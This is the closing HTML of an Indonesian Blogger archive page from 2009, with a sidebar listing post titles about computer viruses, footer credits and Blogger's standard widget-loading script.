<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2010/07/'>Juli</a>
<span class='post-count' dir='ltr'>(6)</span>
</li>
</ul>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2010/05/'>Mei</a>
<span class='post-count' dir='ltr'>(4)</span>
</li>
</ul>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2010/04/'>April</a>
<span class='post-count' dir='ltr'>(7)</span>
</li>
</ul>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2010/02/'>Februari</a>
<span class='post-count' dir='ltr'>(29)</span>
</li>
</ul>
</li>
</ul>
<ul>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>▼ </span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2009/'>2009</a>
<span class='post-count' dir='ltr'>(52)</span>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2009/11/'>November</a>
<span class='post-count' dir='ltr'>(1)</span>
</li>
</ul>
<ul>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>▼ </span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2009/10/'>Oktober</a>
<span class='post-count' dir='ltr'>(7)</span>
<ul class='posts'>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/mau-hp-gratis-hp-hdtv-yang-gamers-ada.html'>Dapat kan HP,Ipod,PS3 DLL gratis ko,, sumpahhhhhhh...</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/virus-brontok.html'>Virus Brontok</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/virus-vbs.html'>Virus VBS</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/virus-mellisa.html'>Virus Mellisa</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/virus-i-love-u.html'>Virus I Love U</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/bikin-virus-dalam-sekejap-masih-ingat.html'>bikin virus dlm sekejap</a></li>
<li><a href='https://jangkrikvirusdago.blogspot.com/2009/10/macam-virus-komputer.html'>Macam Virus KOMPUTER</a></li>
</ul>
</li>
</ul>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2009/07/'>Juli</a>
<span class='post-count' dir='ltr'>(14)</span>
</li>
</ul>
<ul>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

				  ► 
				
</span>
</a>
<a class='post-count-link' href='https://jangkrikvirusdago.blogspot.com/2009/06/'>Juni</a>
<span class='post-count' dir='ltr'>(30)</span>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class='clear'></div>
</div>
</div></div>
</ul>
</div>
<!-- /Sidebar -->
<div class='end_line'></div>
</div>
<!-- /Container -->
</div>
<!-- /Wrapper -->
<!-- Footer -->
<div id='footer'>
<!-- RSS -->
<div id='rss'><a href='/feeds/posts/default'></a></div>
<!-- /RSS -->
<!-- Bottom Navigation Menu -->
<div id='task-nav'>
<div class='task-nav1 no-items section' id='task-nav1'>
</div>
</div>
<!-- /Bottom Navigation Menu -->
<div id='clock'>
<script type='text/javascript'>var d = new Date(); document.write(d.getHours()+':'+d.getMinutes());</script>
</div>
<div id='credit-icon'></div>
<!-- Credit -->
<div id='credit-box'>
	  Copyright  2009
	  <a href='https://jangkrikvirusdago.blogspot.com/'>jangkrik dago</a>
<br/>
<a href='http://www.ezwpthemes.com/'>Free WordPress Themes</a>
	  designed by
	  <a href='http://www.ezwpthemes.com/'>EZwpthemes</a>
<br/>
	  Converted into <a href='http://themecraft.net'>Blogger Templates</a> by <a href='http://themecraft.net'>Theme Craft</a> | <a href='http://www.falconhive.com'>Falcon Hive</a>
</div>
<!-- /Credit -->
<div class='endline'></div>
</div>
<!-- /Footer -->

<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/2218197725-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY4nyKJ78D-jzQUPF-jgv6a_Qb2fdA:1744772592193';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d1518176830031402701','//jangkrikvirusdago.blogspot.com/2009/10/','1518176830031402701');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '1518176830031402701', 'title': 'jangkrik dago', 'url': 'https://jangkrikvirusdago.blogspot.com/2009/10/', 'canonicalUrl': 'http://jangkrikvirusdago.blogspot.com/2009/10/', 'homepageUrl': 'https://jangkrikvirusdago.blogspot.com/', 'searchUrl': 'https://jangkrikvirusdago.blogspot.com/search', 'canonicalHomepageUrl': 'http://jangkrikvirusdago.blogspot.com/', 'blogspotFaviconUrl': 'https://jangkrikvirusdago.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22jangkrik dago - Atom\x22 href\x3d\x22https://jangkrikvirusdago.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22jangkrik dago - RSS\x22 href\x3d\x22https://jangkrikvirusdago.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22jangkrik dago - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/1518176830031402701/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/416a3bf2168b10d3', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Bagikan ke X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'archive', 'pageName': 'Oktober 2009', 'pageTitle': 'jangkrik dago: Oktober 2009'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'jangkrik dago', 'description': 'yuck coba iseng-iseng dech buka blog ni!!!!!', 'url': 'https://jangkrikvirusdago.blogspot.com/2009/10/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2009, 'month': 10, 'rangeMessage': 'Menampilkan postingan dari Oktober, 2009'}}}]);
_WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header1', document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/709570948-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'welcome1', document.getElementById('HTML4'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'welcome1', document.getElementById('Profile1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'welcome1', document.getElementById('HTML1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image10', 'welcome1', document.getElementById('Image10'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image11', 'welcome1', document.getElementById('Image11'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image5', 'welcome1', document.getElementById('Image5'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_FollowersView', new _WidgetInfo('Followers1', 'welcome1', document.getElementById('Followers1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PollView', new _WidgetInfo('Poll1', 'welcome1', document.getElementById('Poll1'), {'pollid': '2414118921187359066', 'iframeurl': '/b/poll-results?pollWidget\x3dPoll1\x26txtclr\x3d%23555555\x26lnkclr\x3d%23a7b0b7\x26chrtclr\x3d%23a7b0b7\x26font\x3dnormal+normal+100%25+Arial,+Verdana,+Sans-Serif\x26hideq\x3dtrue\x26purl\x3dhttps://jangkrikvirusdago.blogspot.com/'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image6', 'welcome1', document.getElementById('Image6'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image7', 'welcome1', document.getElementById('Image7'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image8', 'welcome1', document.getElementById('Image8'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML99', 'welcome1', document.getElementById('HTML99'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image9', 'welcome1', document.getElementById('Image9'), {'resize': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'welcome1', document.getElementById('HTML3'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar1', document.getElementById('HTML2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar1', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList1', 'sidebar1', document.getElementById('PageList1'), {'title': 'Laman', 'links': [{'isCurrentPage': false, 'href': 'https://jangkrikvirusdago.blogspot.com/', 'title': 'Halaman Muka'}], 'mobile': false, 'showPlaceholder': true, 'hasCurrentPage': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar1', document.getElementById('Label1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar1', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Memuat\x26hellip;'}, 'displayModeFull'));
</script>
</body>
</html>